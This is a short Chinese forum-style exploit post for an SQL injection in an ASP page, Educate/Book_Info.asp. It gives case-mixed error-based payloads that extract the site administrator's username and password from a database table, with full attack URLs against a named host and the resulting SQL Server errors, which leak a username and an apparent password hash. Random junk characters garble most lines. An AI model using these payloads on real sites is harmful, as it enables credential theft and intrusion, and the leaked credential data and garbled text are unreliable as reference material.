漏洞出现在Educate/Book_Info.asp) g2 y1 H* t+ |. w% O
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
. h& U% r2 K& p- }$ f8 k. \exp:如下
* N. ?, H$ w1 r1 `查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
/ k( I$ U( z! z9 x0 d: s3 N查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
3 C8 X8 h. {6 W7 w1 ^" m2 u" _# dhttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
) C# `; w; p( b5 F2 X2 f% OMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'/ q% X: D# B4 v
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。- z4 m- \) c" C T# }+ Y
/Educate/Book_Info.asp,行 89 G! l# E$ y" m. G0 l
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
3 B! C; T3 A; gMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
0 v$ g) _$ m8 ?6 p将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
5 n1 R/ R# @: c& L/Educate/Book_Info.asp,行 8 |